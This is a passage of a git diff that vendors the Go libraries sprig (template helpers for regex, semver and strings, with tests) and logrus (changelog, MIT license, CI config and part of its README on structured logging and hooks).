+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestRegexMatch(t *testing.T) {
+	regex := "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}"
+
+	assert.True(t, regexMatch(regex, "test@acme.com"))
+	assert.True(t, regexMatch(regex, "Test@Acme.Com"))
+	assert.False(t, regexMatch(regex, "test"))
+	assert.False(t, regexMatch(regex, "test.com"))
+	assert.False(t, regexMatch(regex, "test@acme"))
+}
+
+func TestRegexFindAll(t *testing.T){
+	regex := "a{2}"
+	assert.Equal(t, 1, len(regexFindAll(regex, "aa", -1)))
+	assert.Equal(t, 1, len(regexFindAll(regex, "aaaaaaaa", 1)))
+	assert.Equal(t, 2, len(regexFindAll(regex, "aaaa", -1)))
+	assert.Equal(t, 0, len(regexFindAll(regex, "none", -1)))
+}
+
+func TestRegexFindl(t *testing.T){
+	regex := "fo.?"
+	assert.Equal(t, "foo", regexFind(regex, "foorbar"))
+	assert.Equal(t, "foo", regexFind(regex, "foo foe fome"))
+	assert.Equal(t, "", regexFind(regex, "none"))
+}
+
+func TestRegexReplaceAll(t *testing.T){
+	regex := "a(x*)b"
+	assert.Equal(t, "-T-T-", regexReplaceAll(regex,"-ab-axxb-", "T"))
+	assert.Equal(t, "--xx-", regexReplaceAll(regex,"-ab-axxb-", "$1"))
+	assert.Equal(t, "---", regexReplaceAll(regex,"-ab-axxb-", "$1W"))
+	assert.Equal(t, "-W-xxW-", regexReplaceAll(regex,"-ab-axxb-", "${1}W"))
+}
+
+func TestRegexReplaceAllLiteral(t *testing.T){
+	regex := "a(x*)b"
+	assert.Equal(t, "-T-T-", regexReplaceAllLiteral(regex,"-ab-axxb-", "T"))
+	assert.Equal(t, "-$1-$1-", regexReplaceAllLiteral(regex,"-ab-axxb-", "$1"))
+	assert.Equal(t, "-${1}-${1}-", regexReplaceAllLiteral(regex,"-ab-axxb-", "${1}"))
+}
+
+func TestRegexSplit(t *testing.T){
+	regex := "a"
+	assert.Equal(t, 4, len(regexSplit(regex,"banana", -1)))
+	assert.Equal(t, 0, len(regexSplit(regex,"banana", 0)))
+	assert.Equal(t, 1, len(regexSplit(regex,"banana", 1)))
+	assert.Equal(t, 2, len(regexSplit(regex,"banana", 2)))
+
+	regex = "z+"
+	assert.Equal(t, 2, len(regexSplit(regex,"pizza", -1)))
+	assert.Equal(t, 0, len(regexSplit(regex,"pizza", 0)))
+	assert.Equal(t, 1, len(regexSplit(regex,"pizza", 1)))
+	assert.Equal(t, 2, len(regexSplit(regex,"pizza", 2)))
+}
\ No newline at end of file
diff --git a/vendor/github.com/Masterminds/sprig/semver.go b/vendor/github.com/Masterminds/sprig/semver.go
new file mode 100644
index 0000000000..c2bf8a1fdf
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/semver.go
@@ -0,0 +1,23 @@
+package sprig
+
+import (
+	sv2 "github.com/Masterminds/semver"
+)
+
+func semverCompare(constraint, version string) (bool, error) {
+	c, err := sv2.NewConstraint(constraint)
+	if err != nil {
+		return false, err
+	}
+
+	v, err := sv2.NewVersion(version)
+	if err != nil {
+		return false, err
+	}
+
+	return c.Check(v), nil
+}
+
+func semver(version string) (*sv2.Version, error) {
+	return sv2.NewVersion(version)
+}
diff --git a/vendor/github.com/Masterminds/sprig/semver_test.go b/vendor/github.com/Masterminds/sprig/semver_test.go
new file mode 100644
index 0000000000..53d3c8be9b
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/semver_test.go
@@ -0,0 +1,31 @@
+package sprig
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestSemverCompare(t *testing.T) {
+	tests := map[string]string{
+		`{{ semverCompare "1.2.3" "1.2.3" }}`:  `true`,
+		`{{ semverCompare "^1.2.0" "1.2.3" }}`: `true`,
+		`{{ semverCompare "^1.2.0" "2.2.3" }}`: `false`,
+	}
+	for tpl, expect := range tests {
+		assert.NoError(t, runt(tpl, expect))
+	}
+}
+
+func TestSemver(t *testing.T) {
+	tests := map[string]string{
+		`{{ $s := semver "1.2.3-beta.1+c0ff33" }}{{ $s.Prerelease }}`: "beta.1",
+		`{{ $s := semver "1.2.3-beta.1+c0ff33" }}{{ $s.Major}}`:       "1",
+		`{{ semver "1.2.3" | (semver "1.2.3").Compare }}`:             `0`,
+		`{{ semver "1.2.3" | (semver "1.3.3").Compare }}`:             `1`,
+		`{{ semver "1.4.3" | (semver "1.2.3").Compare }}`:             `-1`,
+	}
+	for tpl, expect := range tests {
+		assert.NoError(t, runt(tpl, expect))
+	}
+}
diff --git a/vendor/github.com/Masterminds/sprig/strings.go b/vendor/github.com/Masterminds/sprig/strings.go
new file mode 100644
index 0000000000..f6afa2ff9e
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/strings.go
@@ -0,0 +1,201 @@
+package sprig
+
+import (
+	"encoding/base32"
+	"encoding/base64"
+	"fmt"
+	"reflect"
+	"strconv"
+	"strings"
+
+	util "github.com/aokoli/goutils"
+)
+
+func base64encode(v string) string {
+	return base64.StdEncoding.EncodeToString([]byte(v))
+}
+
+func base64decode(v string) string {
+	data, err := base64.StdEncoding.DecodeString(v)
+	if err != nil {
+		return err.Error()
+	}
+	return string(data)
+}
+
+func base32encode(v string) string {
+	return base32.StdEncoding.EncodeToString([]byte(v))
+}
+
+func base32decode(v string) string {
+	data, err := base32.StdEncoding.DecodeString(v)
+	if err != nil {
+		return err.Error()
+	}
+	return string(data)
+}
+
+func abbrev(width int, s string) string {
+	if width < 4 {
+		return s
+	}
+	r, _ := util.Abbreviate(s, width)
+	return r
+}
+
+func abbrevboth(left, right int, s string) string {
+	if right < 4 || left > 0 && right < 7 {
+		return s
+	}
+	r, _ := util.AbbreviateFull(s, left, right)
+	return r
+}
+func initials(s string) string {
+	// Wrap this just to eliminate the var args, which templates don't do well.
+	return util.Initials(s)
+}
+
+func randAlphaNumeric(count int) string {
+	// It is not possible, it appears, to actually generate an error here.
+	r, _ := util.RandomAlphaNumeric(count)
+	return r
+}
+
+func randAlpha(count int) string {
+	r, _ := util.RandomAlphabetic(count)
+	return r
+}
+
+func randAscii(count int) string {
+	r, _ := util.RandomAscii(count)
+	return r
+}
+
+func randNumeric(count int) string {
+	r, _ := util.RandomNumeric(count)
+	return r
+}
+
+func untitle(str string) string {
+	return util.Uncapitalize(str)
+}
+
+func quote(str ...interface{}) string {
+	out := make([]string, len(str))
+	for i, s := range str {
+		out[i] = fmt.Sprintf("%q", strval(s))
+	}
+	return strings.Join(out, " ")
+}
+
+func squote(str ...interface{}) string {
+	out := make([]string, len(str))
+	for i, s := range str {
+		out[i] = fmt.Sprintf("'%v'", s)
+	}
+	return strings.Join(out, " ")
+}
+
+func cat(v ...interface{}) string {
+	r := strings.TrimSpace(strings.Repeat("%v ", len(v)))
+	return fmt.Sprintf(r, v...)
+}
+
+func indent(spaces int, v string) string {
+	pad := strings.Repeat(" ", spaces)
+	return pad + strings.Replace(v, "\n", "\n"+pad, -1)
+}
+
+func nindent(spaces int, v string) string {
+	return "\n" + indent(spaces, v)
+}
+
+func replace(old, new, src string) string {
+	return strings.Replace(src, old, new, -1)
+}
+
+func plural(one, many string, count int) string {
+	if count == 1 {
+		return one
+	}
+	return many
+}
+
+func strslice(v interface{}) []string {
+	switch v := v.(type) {
+	case []string:
+		return v
+	case []interface{}:
+		l := len(v)
+		b := make([]string, l)
+		for i := 0; i < l; i++ {
+			b[i] = strval(v[i])
+		}
+		return b
+	default:
+		val := reflect.ValueOf(v)
+		switch val.Kind() {
+		case reflect.Array, reflect.Slice:
+			l := val.Len()
+			b := make([]string, l)
+			for i := 0; i < l; i++ {
+				b[i] = strval(val.Index(i).Interface())
+			}
+			return b
+		default:
+			return []string{strval(v)}
+		}
+	}
+}
+
+func strval(v interface{}) string {
+	switch v := v.(type) {
+	case string:
+		return v
+	case []byte:
+		return string(v)
+	case error:
+		return v.Error()
+	case fmt.Stringer:
+		return v.String()
+	default:
+		return fmt.Sprintf("%v", v)
+	}
+}
+
+func trunc(c int, s string) string {
+	if len(s) <= c {
+		return s
+	}
+	return s[0:c]
+}
+
+func join(sep string, v interface{}) string {
+	return strings.Join(strslice(v), sep)
+}
+
+func split(sep, orig string) map[string]string {
+	parts := strings.Split(orig, sep)
+	res := make(map[string]string, len(parts))
+	for i, v := range parts {
+		res["_"+strconv.Itoa(i)] = v
+	}
+	return res
+}
+
+// substring creates a substring of the given string.
+//
+// If start is < 0, this calls string[:length].
+//
+// If start is >= 0 and length < 0, this calls string[start:]
+//
+// Otherwise, this calls string[start, length].
+func substring(start, length int, s string) string {
+	if start < 0 {
+		return s[:length]
+	}
+	if length < 0 {
+		return s[start:]
+	}
+	return s[start:length]
+}
diff --git a/vendor/github.com/Masterminds/sprig/strings_test.go b/vendor/github.com/Masterminds/sprig/strings_test.go
new file mode 100644
index 0000000000..79bfcf5483
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/strings_test.go
@@ -0,0 +1,227 @@
+package sprig
+
+import (
+	"encoding/base32"
+	"encoding/base64"
+	"fmt"
+	"math/rand"
+	"testing"
+
+	"github.com/aokoli/goutils"
+	"github.com/stretchr/testify/assert"
+)
+
+func TestSubstr(t *testing.T) {
+	tpl := `{{"fooo" | substr 0 3 }}`
+	if err := runt(tpl, "foo"); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestTrunc(t *testing.T) {
+	tpl := `{{ "foooooo" | trunc 3 }}`
+	if err := runt(tpl, "foo"); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestQuote(t *testing.T) {
+	tpl := `{{quote "a" "b" "c"}}`
+	if err := runt(tpl, `"a" "b" "c"`); err != nil {
+		t.Error(err)
+	}
+	tpl = `{{quote "\"a\"" "b" "c"}}`
+	if err := runt(tpl, `"\"a\"" "b" "c"`); err != nil {
+		t.Error(err)
+	}
+	tpl = `{{quote 1 2 3 }}`
+	if err := runt(tpl, `"1" "2" "3"`); err != nil {
+		t.Error(err)
+	}
+}
+func TestSquote(t *testing.T) {
+	tpl := `{{squote "a" "b" "c"}}`
+	if err := runt(tpl, `'a' 'b' 'c'`); err != nil {
+		t.Error(err)
+	}
+	tpl = `{{squote 1 2 3 }}`
+	if err := runt(tpl, `'1' '2' '3'`); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestContains(t *testing.T) {
+	// Mainly, we're just verifying the paramater order swap.
+	tests := []string{
+		`{{if contains "cat" "fair catch"}}1{{end}}`,
+		`{{if hasPrefix "cat" "catch"}}1{{end}}`,
+		`{{if hasSuffix "cat" "ducat"}}1{{end}}`,
+	}
+	for _, tt := range tests {
+		if err := runt(tt, "1"); err != nil {
+			t.Error(err)
+		}
+	}
+}
+
+func TestTrim(t *testing.T) {
+	tests := []string{
+		`{{trim "   5.00   "}}`,
+		`{{trimAll "$" "$5.00$"}}`,
+		`{{trimPrefix "$" "$5.00"}}`,
+		`{{trimSuffix "$" "5.00$"}}`,
+	}
+	for _, tt := range tests {
+		if err := runt(tt, "5.00"); err != nil {
+			t.Error(err)
+		}
+	}
+}
+
+func TestSplit(t *testing.T) {
+	tpl := `{{$v := "foo$bar$baz" | split "$"}}{{$v._0}}`
+	if err := runt(tpl, "foo"); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestToString(t *testing.T) {
+	tpl := `{{ toString 1 | kindOf }}`
+	assert.NoError(t, runt(tpl, "string"))
+}
+
+func TestToStrings(t *testing.T) {
+	tpl := `{{ $s := list 1 2 3 | toStrings }}{{ index $s 1 | kindOf }}`
+	assert.NoError(t, runt(tpl, "string"))
+}
+
+func TestJoin(t *testing.T) {
+	assert.NoError(t, runt(`{{ tuple "a" "b" "c" | join "-" }}`, "a-b-c"))
+	assert.NoError(t, runt(`{{ tuple 1 2 3 | join "-" }}`, "1-2-3"))
+	assert.NoError(t, runtv(`{{ join "-" .V }}`, "a-b-c", map[string]interface{}{"V": []string{"a", "b", "c"}}))
+	assert.NoError(t, runtv(`{{ join "-" .V }}`, "abc", map[string]interface{}{"V": "abc"}))
+	assert.NoError(t, runtv(`{{ join "-" .V }}`, "1-2-3", map[string]interface{}{"V": []int{1, 2, 3}}))
+}
+
+func TestSortAlpha(t *testing.T) {
+	// Named `append` in the function map
+	tests := map[string]string{
+		`{{ list "c" "a" "b" | sortAlpha | join "" }}`: "abc",
+		`{{ list 2 1 4 3 | sortAlpha | join "" }}`:     "1234",
+	}
+	for tpl, expect := range tests {
+		assert.NoError(t, runt(tpl, expect))
+	}
+}
+func TestBase64EncodeDecode(t *testing.T) {
+	magicWord := "coffee"
+	expect := base64.StdEncoding.EncodeToString([]byte(magicWord))
+
+	if expect == magicWord {
+		t.Fatal("Encoder doesn't work.")
+	}
+
+	tpl := `{{b64enc "coffee"}}`
+	if err := runt(tpl, expect); err != nil {
+		t.Error(err)
+	}
+	tpl = fmt.Sprintf("{{b64dec %q}}", expect)
+	if err := runt(tpl, magicWord); err != nil {
+		t.Error(err)
+	}
+}
+func TestBase32EncodeDecode(t *testing.T) {
+	magicWord := "coffee"
+	expect := base32.StdEncoding.EncodeToString([]byte(magicWord))
+
+	if expect == magicWord {
+		t.Fatal("Encoder doesn't work.")
+	}
+
+	tpl := `{{b32enc "coffee"}}`
+	if err := runt(tpl, expect); err != nil {
+		t.Error(err)
+	}
+	tpl = fmt.Sprintf("{{b32dec %q}}", expect)
+	if err := runt(tpl, magicWord); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestGoutils(t *testing.T) {
+	tests := map[string]string{
+		`{{abbrev 5 "hello world"}}`:           "he...",
+		`{{abbrevboth 5 10 "1234 5678 9123"}}`: "...5678...",
+		`{{nospace "h e l l o "}}`:             "hello",
+		`{{untitle "First Try"}}`:              "first try", //https://youtu.be/44-RsrF_V_w
+		`{{initials "First Try"}}`:             "FT",
+		`{{wrap 5 "Hello World"}}`:             "Hello\nWorld",
+		`{{wrapWith 5 "\t" "Hello World"}}`:    "Hello\tWorld",
+	}
+	for k, v := range tests {
+		t.Log(k)
+		if err := runt(k, v); err != nil {
+			t.Errorf("Error on tpl %q: %s", k, err)
+		}
+	}
+}
+
+func TestRandom(t *testing.T) {
+	// One of the things I love about Go:
+	goutils.RANDOM = rand.New(rand.NewSource(1))
+
+	// Because we're using a random number generator, we need these to go in
+	// a predictable sequence:
+	if err := runt(`{{randAlphaNum 5}}`, "9bzRv"); err != nil {
+		t.Errorf("Error on tpl: %s", err)
+	}
+	if err := runt(`{{randAlpha 5}}`, "VjwGe"); err != nil {
+		t.Errorf("Error on tpl: %s", err)
+	}
+	if err := runt(`{{randAscii 5}}`, "1KA5p"); err != nil {
+		t.Errorf("Error on tpl: %s", err)
+	}
+	if err := runt(`{{randNumeric 5}}`, "26018"); err != nil {
+		t.Errorf("Error on tpl: %s", err)
+	}
+
+}
+
+func TestCat(t *testing.T) {
+	tpl := `{{$b := "b"}}{{"c" | cat "a" $b}}`
+	if err := runt(tpl, "a b c"); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestIndent(t *testing.T) {
+	tpl := `{{indent 4 "a\nb\nc"}}`
+	if err := runt(tpl, "    a\n    b\n    c"); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestNindent(t *testing.T) {
+	tpl := `{{nindent 4 "a\nb\nc"}}`
+	if err := runt(tpl, "\n    a\n    b\n    c"); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestReplace(t *testing.T) {
+	tpl := `{{"I Am Henry VIII" | replace " " "-"}}`
+	if err := runt(tpl, "I-Am-Henry-VIII"); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestPlural(t *testing.T) {
+	tpl := `{{$num := len "two"}}{{$num}} {{$num | plural "1 char" "chars"}}`
+	if err := runt(tpl, "3 chars"); err != nil {
+		t.Error(err)
+	}
+	tpl = `{{len "t" | plural "cheese" "%d chars"}}`
+	if err := runt(tpl, "cheese"); err != nil {
+		t.Error(err)
+	}
+}
diff --git a/vendor/github.com/Sirupsen/logrus/.gitignore b/vendor/github.com/Sirupsen/logrus/.gitignore
new file mode 100644
index 0000000000..66be63a005
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/.gitignore
@@ -0,0 +1 @@
+logrus
diff --git a/vendor/github.com/Sirupsen/logrus/.travis.yml b/vendor/github.com/Sirupsen/logrus/.travis.yml
new file mode 100644
index 0000000000..a23296a53b
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/.travis.yml
@@ -0,0 +1,15 @@
+language: go
+go:
+  - 1.6.x
+  - 1.7.x
+  - 1.8.x
+  - tip
+env:
+  - GOMAXPROCS=4 GORACE=halt_on_error=1
+install:
+  - go get github.com/stretchr/testify/assert
+  - go get gopkg.in/gemnasium/logrus-airbrake-hook.v2
+  - go get golang.org/x/sys/unix
+  - go get golang.org/x/sys/windows
+script:
+  - go test -race -v ./...
diff --git a/vendor/github.com/Sirupsen/logrus/CHANGELOG.md b/vendor/github.com/Sirupsen/logrus/CHANGELOG.md
new file mode 100644
index 0000000000..1bd1deb294
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/CHANGELOG.md
@@ -0,0 +1,123 @@
+# 1.0.5
+
+* Fix hooks race (#707)
+* Fix panic deadlock (#695)
+
+# 1.0.4
+
+* Fix race when adding hooks (#612)
+* Fix terminal check in AppEngine (#635)
+
+# 1.0.3
+
+* Replace example files with testable examples
+
+# 1.0.2
+
+* bug: quote non-string values in text formatter (#583)
+* Make (*Logger) SetLevel a public method
+
+# 1.0.1
+
+* bug: fix escaping in text formatter (#575)
+
+# 1.0.0
+
+* Officially changed name to lower-case
+* bug: colors on Windows 10 (#541)
+* bug: fix race in accessing level (#512)
+
+# 0.11.5
+
+* feature: add writer and writerlevel to entry (#372)
+
+# 0.11.4
+
+* bug: fix undefined variable on solaris (#493)
+
+# 0.11.3
+
+* formatter: configure quoting of empty values (#484)
+* formatter: configure quoting character (default is `"`) (#484)
+* bug: fix not importing io correctly in non-linux environments (#481)
+
+# 0.11.2
+
+* bug: fix windows terminal detection (#476)
+
+# 0.11.1
+
+* bug: fix tty detection with custom out (#471)
+
+# 0.11.0
+
+* performance: Use bufferpool to allocate (#370)
+* terminal: terminal detection for app-engine (#343)
+* feature: exit handler (#375)
+
+# 0.10.0
+
+* feature: Add a test hook (#180)
+* feature: `ParseLevel` is now case-insensitive (#326)
+* feature: `FieldLogger` interface that generalizes `Logger` and `Entry` (#308)
+* performance: avoid re-allocations on `WithFields` (#335)
+
+# 0.9.0
+
+* logrus/text_formatter: don't emit empty msg
+* logrus/hooks/airbrake: move out of main repository
+* logrus/hooks/sentry: move out of main repository
+* logrus/hooks/papertrail: move out of main repository
+* logrus/hooks/bugsnag: move out of main repository
+* logrus/core: run tests with `-race`
+* logrus/core: detect TTY based on `stderr`
+* logrus/core: support `WithError` on logger
+* logrus/core: Solaris support
+
+# 0.8.7
+
+* logrus/core: fix possible race (#216)
+* logrus/doc: small typo fixes and doc improvements
+
+
+# 0.8.6
+
+* hooks/raven: allow passing an initialized client
+
+# 0.8.5
+
+* logrus/core: revert #208
+
+# 0.8.4
+
+* formatter/text: fix data race (#218)
+
+# 0.8.3
+
+* logrus/core: fix entry log level (#208)
+* logrus/core: improve performance of text formatter by 40%
+* logrus/core: expose `LevelHooks` type
+* logrus/core: add support for DragonflyBSD and NetBSD
+* formatter/text: print structs more verbosely
+
+# 0.8.2
+
+* logrus: fix more Fatal family functions
+
+# 0.8.1
+
+* logrus: fix not exiting on `Fatalf` and `Fatalln`
+
+# 0.8.0
+
+* logrus: defaults to stderr instead of stdout
+* hooks/sentry: add special field for `*http.Request`
+* formatter/text: ignore Windows for colors
+
+# 0.7.3
+
+* formatter/\*: allow configuration of timestamp layout
+
+# 0.7.2
+
+* formatter/text: Add configuration option for time format (#158)
diff --git a/vendor/github.com/Sirupsen/logrus/LICENSE b/vendor/github.com/Sirupsen/logrus/LICENSE
new file mode 100644
index 0000000000..f090cb42f3
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/LICENSE
@@ -0,0 +1,21 @@
+The MIT License (MIT)
+
+Copyright (c) 2014 Simon Eskildsen
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in
+all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+THE SOFTWARE.
diff --git a/vendor/github.com/Sirupsen/logrus/README.md b/vendor/github.com/Sirupsen/logrus/README.md
new file mode 100644
index 0000000000..f77819b168
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/README.md
@@ -0,0 +1,511 @@
+# Logrus <img src="http://i.imgur.com/hTeVwmJ.png" width="40" height="40" alt=":walrus:" class="emoji" title=":walrus:"/>&nbsp;[![Build Status](https://travis-ci.org/sirupsen/logrus.svg?branch=master)](https://travis-ci.org/sirupsen/logrus)&nbsp;[![GoDoc](https://godoc.org/github.com/sirupsen/logrus?status.svg)](https://godoc.org/github.com/sirupsen/logrus)
+
+Logrus is a structured logger for Go (golang), completely API compatible with
+the standard library logger.
+
+**Seeing weird case-sensitive problems?** It's in the past been possible to
+import Logrus as both upper- and lower-case. Due to the Go package environment,
+this caused issues in the community and we needed a standard. Some environments
+experienced problems with the upper-case variant, so the lower-case was decided.
+Everything using `logrus` will need to use the lower-case:
+`github.com/sirupsen/logrus`. Any package that isn't, should be changed.
+
+To fix Glide, see [these
+comments](https://github.com/sirupsen/logrus/issues/553#issuecomment-306591437).
+For an in-depth explanation of the casing issue, see [this
+comment](https://github.com/sirupsen/logrus/issues/570#issuecomment-313933276).
+
+**Are you interested in assisting in maintaining Logrus?** Currently I have a
+lot of obligations, and I am unable to provide Logrus with the maintainership it
+needs. If you'd like to help, please reach out to me at `simon at author's
+username dot com`.
+
+Nicely color-coded in development (when a TTY is attached, otherwise just
+plain text):
+
+![Colored](http://i.imgur.com/PY7qMwd.png)
+
+With `log.SetFormatter(&log.JSONFormatter{})`, for easy parsing by logstash
+or Splunk:
+
+```json
+{"animal":"walrus","level":"info","msg":"A group of walrus emerges from the
+ocean","size":10,"time":"2014-03-10 19:57:38.562264131 -0400 EDT"}
+
+{"level":"warning","msg":"The group's number increased tremendously!",
+"number":122,"omg":true,"time":"2014-03-10 19:57:38.562471297 -0400 EDT"}
+
+{"animal":"walrus","level":"info","msg":"A giant walrus appears!",
+"size":10,"time":"2014-03-10 19:57:38.562500591 -0400 EDT"}
+
+{"animal":"walrus","level":"info","msg":"Tremendously sized cow enters the ocean.",
+"size":9,"time":"2014-03-10 19:57:38.562527896 -0400 EDT"}
+
+{"level":"fatal","msg":"The ice breaks!","number":100,"omg":true,
+"time":"2014-03-10 19:57:38.562543128 -0400 EDT"}
+```
+
+With the default `log.SetFormatter(&log.TextFormatter{})` when a TTY is not
+attached, the output is compatible with the
+[logfmt](http://godoc.org/github.com/kr/logfmt) format:
+
+```text
+time="2015-03-26T01:27:38-04:00" level=debug msg="Started observing beach" animal=walrus number=8
+time="2015-03-26T01:27:38-04:00" level=info msg="A group of walrus emerges from the ocean" animal=walrus size=10
+time="2015-03-26T01:27:38-04:00" level=warning msg="The group's number increased tremendously!" number=122 omg=true
+time="2015-03-26T01:27:38-04:00" level=debug msg="Temperature changes" temperature=-4
+time="2015-03-26T01:27:38-04:00" level=panic msg="It's over 9000!" animal=orca size=9009
+time="2015-03-26T01:27:38-04:00" level=fatal msg="The ice breaks!" err=&{0x2082280c0 map[animal:orca size:9009] 2015-03-26 01:27:38.441574009 -0400 EDT panic It's over 9000!} number=100 omg=true
+exit status 1
+```
+
+#### Case-sensitivity
+
+The organization's name was changed to lower-case--and this will not be changed
+back. If you are getting import conflicts due to case sensitivity, please use
+the lower-case import: `github.com/sirupsen/logrus`.
+
+#### Example
+
+The simplest way to use Logrus is simply the package-level exported logger:
+
+```go
+package main
+
+import (
+  log "github.com/sirupsen/logrus"
+)
+
+func main() {
+  log.WithFields(log.Fields{
+    "animal": "walrus",
+  }).Info("A walrus appears")
+}
+```
+
+Note that it's completely api-compatible with the stdlib logger, so you can
+replace your `log` imports everywhere with `log "github.com/sirupsen/logrus"`
+and you'll now have the flexibility of Logrus. You can customize it all you
+want:
+
+```go
+package main
+
+import (
+  "os"
+  log "github.com/sirupsen/logrus"
+)
+
+func init() {
+  // Log as JSON instead of the default ASCII formatter.
+  log.SetFormatter(&log.JSONFormatter{})
+
+  // Output to stdout instead of the default stderr
+  // Can be any io.Writer, see below for File example
+  log.SetOutput(os.Stdout)
+
+  // Only log the warning severity or above.
+  log.SetLevel(log.WarnLevel)
+}
+
+func main() {
+  log.WithFields(log.Fields{
+    "animal": "walrus",
+    "size":   10,
+  }).Info("A group of walrus emerges from the ocean")
+
+  log.WithFields(log.Fields{
+    "omg":    true,
+    "number": 122,
+  }).Warn("The group's number increased tremendously!")
+
+  log.WithFields(log.Fields{
+    "omg":    true,
+    "number": 100,
+  }).Fatal("The ice breaks!")
+
+  // A common pattern is to re-use fields between logging statements by re-using
+  // the logrus.Entry returned from WithFields()
+  contextLogger := log.WithFields(log.Fields{
+    "common": "this is a common field",
+    "other": "I also should be logged always",
+  })
+
+  contextLogger.Info("I'll be logged with common and other field")
+  contextLogger.Info("Me too")
+}
+```
+
+For more advanced usage such as logging to multiple locations from the same
+application, you can also create an instance of the `logrus` Logger:
+
+```go
+package main
+
+import (
+  "os"
+  "github.com/sirupsen/logrus"
+)
+
+// Create a new instance of the logger. You can have any number of instances.
+var log = logrus.New()
+
+func main() {
+  // The API for setting attributes is a little different than the package level
+  // exported logger. See Godoc.
+  log.Out = os.Stdout
+
+  // You could set this to any `io.Writer` such as a file
+  // file, err := os.OpenFile("logrus.log", os.O_CREATE|os.O_WRONLY, 0666)
+  // if err == nil {
+  //  log.Out = file
+  // } else {
+  //  log.Info("Failed to log to file, using default stderr")
+  // }
+
+  log.WithFields(logrus.Fields{
+    "animal": "walrus",
+    "size":   10,
+  }).Info("A group of walrus emerges from the ocean")
+}
+```
+
+#### Fields
+
+Logrus encourages careful, structured logging through logging fields instead of
+long, unparseable error messages. For example, instead of: `log.Fatalf("Failed
+to send event %s to topic %s with key %d")`, you should log the much more
+discoverable:
+
+```go
+log.WithFields(log.Fields{
+  "event": event,
+  "topic": topic,
+  "key": key,
+}).Fatal("Failed to send event")
+```
+
+We've found this API forces you to think about logging in a way that produces
+much more useful logging messages. We've been in countless situations where just
+a single added field to a log statement that was already there would've saved us
+hours. The `WithFields` call is optional.
+
+In general, with Logrus using any of the `printf`-family functions should be
+seen as a hint you should add a field, however, you can still use the
+`printf`-family functions with Logrus.
+
+#### Default Fields
+
+Often it's helpful to have fields _always_ attached to log statements in an
+application or parts of one. For example, you may want to always log the
+`request_id` and `user_ip` in the context of a request. Instead of writing
+`log.WithFields(log.Fields{"request_id": request_id, "user_ip": user_ip})` on
+every line, you can create a `logrus.Entry` to pass around instead:
+
+```go
+requestLogger := log.WithFields(log.Fields{"request_id": request_id, "user_ip": user_ip})
+requestLogger.Info("something happened on that request") # will log request_id and user_ip
+requestLogger.Warn("something not great happened")
+```
+
+#### Hooks
+
+You can add hooks for logging levels. For example to send errors to an exception
+tracking service on `Error`, `Fatal` and `Panic`, info to StatsD or log to
+multiple places simultaneously, e.g. syslog.
+
+Logrus comes with [built-in hooks](hooks/). Add those, or your custom hook, in
+`init`:
+
+```go
+import (
+  log "github.com/sirupsen/logrus"
+  "gopkg.in/gemnasium/logrus-airbrake-hook.v2" // the package is named "airbrake"
+  logrus_syslog "github.com/sirupsen/logrus/hooks/syslog"
+  "log/syslog"
+)
+
+func init() {
+
+  // Use the Airbrake hook to report errors that have Error severity or above to
+  // an exception tracker. You can create custom hooks, see the Hooks section.
+  log.AddHook(airbrake.NewHook(123, "xyz", "production"))
+
+  hook, err := logrus_syslog.NewSyslogHook("udp", "localhost:514", syslog.LOG_INFO, "")
+  if err != nil {
+    log.Error("Unable to connect to local syslog daemon")
+  } else {
+    log.AddHook(hook)
+  }
+}
+```
+Note: Syslog hook also support connecting to local syslog (Ex. "/dev/log" or "/var/run/syslog" or "/var/run/log"). For the detail, please check the [syslog hook README](hooks/syslog/README.md).
+
+| Hook  | Description |
+| ----- | ----------- |
+| [Airbrake "legacy"](https://github.com/gemnasium/logrus-airbrake-legacy-hook) | Send errors to an exception tracking service compatible with the Airbrake API V2. Uses [`airbrake-go`](https://github.com/tobi/airbrake-go) behind the scenes. |
+| [Airbrake](https://github.com/gemnasium/logrus-airbrake-hook) | Send errors to the Airbrake API V3. Uses the official [`gobrake`](https://github.com/airbrake/gobrake) behind the scenes. |
+| [Amazon Kinesis](https://github.com/evalphobia/logrus_kinesis) | Hook for logging to [Amazon Kinesis](https://aws.amazon.com/kinesis/) |
+| [Amqp-Hook](https://github.com/vladoatanasov/logrus_amqp) | Hook for logging to Amqp broker (Like RabbitMQ) |
+| [Application Insights](https://github.com/jjcollinge/logrus-appinsights) | Hook for logging to [Application Insights](https://azure.microsoft.com/en-us/services/application-insights/)
